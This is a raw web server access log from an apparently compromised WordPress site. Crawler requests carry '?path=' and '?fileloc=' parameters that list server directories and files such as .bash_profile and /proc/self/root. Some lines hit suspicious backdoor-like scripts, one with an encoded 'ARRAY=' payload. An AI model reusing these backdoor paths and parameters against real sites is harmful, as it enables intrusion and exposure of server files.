136.243.153.17 - - [16/Nov/2025:00:00:51 +0000] "GET /our-works/tv-commercial/tvc-soffell-2/?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2F.bash_profile&path=%2Fvar%2Fwww%2Flamphim%2Fdata HTTP/1.0" 200 3026 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
100.28.133.214 - - [16/Nov/2025:00:00:51 +0000] "GET /tv-commercial/?path=//lib/systemd/user/graphical-session-pre.target.wants HTTP/1.0" 200 3197 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/cache/index1 HTTP/1.0" 200 3680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:52 +0000] "GET /q-~31zP4l7zNaoGSHLKSDVqsMSJKBdiwTlA1780/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory0/node0/power HTTP/1.0" 200 3552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:53 +0000] "GET /q-~61uiOQktaRxevWvKyjonSZATxrxnc4tF25714/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory9 HTTP/1.0" 200 3606 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:54 +0000] "GET /q-~230SpisCvCRVMwABSmqEhOsnyW7FmUYPR3477/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.22.64.232 - - [16/Nov/2025:00:00:54 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/class/input/input0/subsystem/mice/subsystem/input1/device/input HTTP/1.0" 200 3194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:00:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory1/node0 HTTP/1.0" 200 4159 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:55 +0000] "GET /q-~56sOGTjCF8GoMVPiCX9iApZsWVOyBVmI6813/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu0/node0 HTTP/1.0" 200 4122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu1/node0 HTTP/1.0" 200 4127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:57 +0000] "GET /q-~3LuJziVVxgr8RSjWvW5SbvpnEDSplYd45240/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/firmware_node/power HTTP/1.0" 200 3581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:00:58 +0000] "GET /q-~205sGEDzkDpUtYjLgmGjrRzdcKxLrVwZV40046/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:00:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory12/node0/power HTTP/1.0" 200 3551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
44.195.145.102 - - [16/Nov/2025:00:00:59 +0000] "GET /our-works/tvc-jokky/?path=//sys/class/input/event0/subsystem/event0/subsystem/input1/id HTTP/1.0" 200 3323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
69.197.179.242 - - [15/Nov/2025:23:59:00 +0000] "GET /wp-content/pladfa46/index.php?id=383884 HTTP/1.0" 200 166 "https://lamphimquangcao.net/wp-content/pladfa46/index.php?id=383884" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
74.7.227.215 - - [16/Nov/2025:00:00:59 +0000] "GET /q-~23DoTCpwAYXToxQYKuSuyr2YZBKow1Jf2004/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:01 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/node0/cpu0/driver HTTP/1.0" 200 3421 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:01 +0000] "GET /q-~239tNRjhAeQzXwvkvBCFnURqxcFgILJ7s5264/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory13/node0/power HTTP/1.0" 200 3551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:03 +0000] "GET /q-~28X4sEeeEtYwdtr5SLKLDpPokxPTMIiv9631/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.225.24.180 - - [16/Nov/2025:00:01:04 +0000] "GET /our-works/phim-viral-ila/?path=//sys/class/input/input0/subsystem/input5/subsystem/input1/id HTTP/1.0" 200 3325 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:01:04 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu0/hotplug HTTP/1.0" 200 3334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [15/Nov/2025:23:58:45 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343732352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313132352q6234343734323530383732616331653365343761313766346661383632376462222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
74.7.227.215 - - [16/Nov/2025:00:01:06 +0000] "GET /q-~72ELla15xXEcUfuZIpMhApNUohKqONLj6049/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/subsystem/devices/memory1/subsystem/devices/memory4/power HTTP/1.0" 200 3591 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
34.206.193.60 - - [16/Nov/2025:00:01:08 +0000] "GET /our-works/tvc-kimino/?path=//sys/class/misc/uinput/subsystem/snapshot/subsystem/loop-control/subsystem/ecryptfs HTTP/1.0" 200 3375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:01:08 +0000] "GET /q-~62Sa9MiAZPkMzaeiAOVQPyykIbHQnd1Z2693/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
136.243.153.17 - - [16/Nov/2025:00:01:08 +0000] "GET /our-works/tv-commercial/tvc-soffell-2/?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2F.bash_logout&path=%2Fvar%2Fwww%2Flamphim%2Fdata HTTP/1.0" 200 2860 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.8 - - [16/Nov/2025:00:01:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory8/subsystem/devices/memory13/node0/memory3/node0/power HTTP/1.0" 200 3554 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:09 +0000] "GET /q-~12RFgoDNJDp0ckHValKVIHXCguJhmYMI26927/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:10 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/driver/cpu0/node0/memory12 HTTP/1.0" 200 3641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:11 +0000] "GET /q-~20VXVsPfP2TQjNf9GwmcsCYJOyKNuaab2491/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu0/cache HTTP/1.0" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
3.221.156.96 - - [16/Nov/2025:00:01:12 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/class/input/input0/event0/subsystem/input1/subsystem/event1/device HTTP/1.0" 200 3765 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
217.113.194.210 - - [16/Nov/2025:00:01:12 +0000] "GET /our-works/tvc-calci/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes/ms-settings.php&path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-includes HTTP/1.0" 200 4449 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
74.7.227.215 - - [16/Nov/2025:00:01:13 +0000] "GET /q-~2OghCPgNhBGpzkGKHHqTk44eEcXCFXo49839/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:13 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu1/power HTTP/1.0" 200 3609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:13 +0000] "GET /q-~43sValbDQgXKdRvABzGyahsBPECY2Qdm38456/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:14 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/firmware_node HTTP/1.0" 200 3589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
18.209.201.119 - - [16/Nov/2025:00:01:14 +0000] "GET /our-works/tvc-calci/?path=//proc/self/root/sys/class/input/input0/subsystem/input1/id HTTP/1.0" 200 3341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:01:15 +0000] "GET /q-~238AiWiIALwSnRFM1iZsUZNPSoWQnA7RL597/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu1/cache HTTP/1.0" 200 3416 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:16 +0000] "GET /q-~14iVGswKLG1KdvYCPSxCSBMHbUGNnlwj16279/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/node0/cpu1/cache HTTP/1.0" 200 3410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:17 +0000] "GET /q-~54eLJJqCyeIFopdBxUicwkS5WETWKTdr38783/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:17 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu0/driver HTTP/1.0" 200 3418 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory14/node0/power HTTP/1.0" 500 820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:18 +0000] "GET /q-~295cKsXtUpyBFoNoCMBEctmc1HpORbedf6924/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.54.15.103 - - [16/Nov/2025:00:01:18 +0000] "GET /our-works/tvc-relax-gaba/?path=//sys/class/misc/mcelog/subsystem/loop-control/subsystem/snapshot/subsystem/device-mapper HTTP/1.0" 200 3375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
136.243.153.17 - - [16/Nov/2025:00:01:18 +0000] "GET /our-works/phim-viral-ila/?path=%2Fvar%2Flib HTTP/1.0" 200 4622 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
74.7.227.215 - - [16/Nov/2025:00:01:19 +0000] "GET /q-~156aGoDdjIEaafnLSxOQNqeybWe3ae8zZ329/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/node0/cpu1/power HTTP/1.0" 200 3603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:20 +0000] "GET /q-~25NOUOaOS3tuzGKXUvDigyzRpZnmA6Lq4818/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:20 +0000] "GET /q-~66YLEyYUOpeePZNH3ZKqB5bClSQrUFHb5797/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:23 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/memory11/node0/power HTTP/1.0" 200 3552 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:23 +0000] "GET /q-~280EKvkwGjMNgNXAABCTPCHZHDizY3DZb4845/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
40.77.167.5 - - [16/Nov/2025:00:01:24 +0000] "GET /?products=1906053902 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.4.213.199 - - [16/Nov/2025:00:01:24 +0000] "GET /our-works/tvc-calci/?path=//sys/class/input/input1/event1/subsystem/input1/event1/subsystem/event0 HTTP/1.0" 200 3387 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.8 - - [16/Nov/2025:00:01:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu1/driver HTTP/1.0" 200 3424 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:25 +0000] "GET /q-~23YwAqVCnWDJa3zZJCeUGGToEWlcH1Me5234/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/node0/cpu0/power HTTP/1.0" 200 3603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:26 +0000] "GET /q-~187aQFxhCCIEIULcl5xUQkQxrA8jQVxTs390/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
54.157.84.74 - - [16/Nov/2025:00:01:27 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/class/misc/uinput/subsystem/snapshot/subsystem/kvm/subsystem/uinput HTTP/1.0" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:01:27 +0000] "GET /q-~2qbxLJAjrZhSvVwNJJmmkoP1TzO3HOU17377/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu0/firmware_node/power HTTP/1.0" 200 3581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
51.79.248.20 - - [15/Nov/2025:23:59:07 +0000] "GET /wp-includes/js/tinymce/themes/inlite/inlite/index.php?ARRAY=7o2230223n313736333235343734372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736333235313134372q3036303764636263363439663061653530313934623332623965656339636232222p2232223n223563306234623137373836386638613030313830313630386261383031383135222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q33352q35332q36372q38302q38332q3231227q HTTP/1.0" 200 211 "-" "-"
74.7.227.215 - - [16/Nov/2025:00:01:28 +0000] "GET /q-~70y7szWuAwuuBWssJLlmLRHhCLCF2cEv1353/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:29 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/node0/cpu1/driver HTTP/1.0" 200 3419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:29 +0000] "GET /q-~194hkLXilWKIRjcTkjxiFnSdvOUAXNqOO22127/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.215 - - [16/Nov/2025:00:01:30 +0000] "GET /q-~70OuGdCX8TsoJlDXhaxmdQDPMMDiBMmy48829/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.227.8 - - [16/Nov/2025:00:01:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory9/subsystem/devices/memory1/node0/cpu1/driver/cpu1/node0 HTTP/1.0" 200 4123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
50.19.79.213 - - [16/Nov/2025:00:01:30 +0000] "GET /our-works/phim-viral-ila/?path=//sys/devices/virtual/misc/snapshot/subsystem/kvm/subsystem/loop-control HTTP/1.0" 200 3368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.215 - - [16/Nov/2025:00:01:31 +0000] "GET /q-~89rpni2EAGinbYTErJvqyxVlZxMXKlAz45178/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/item.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 3831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
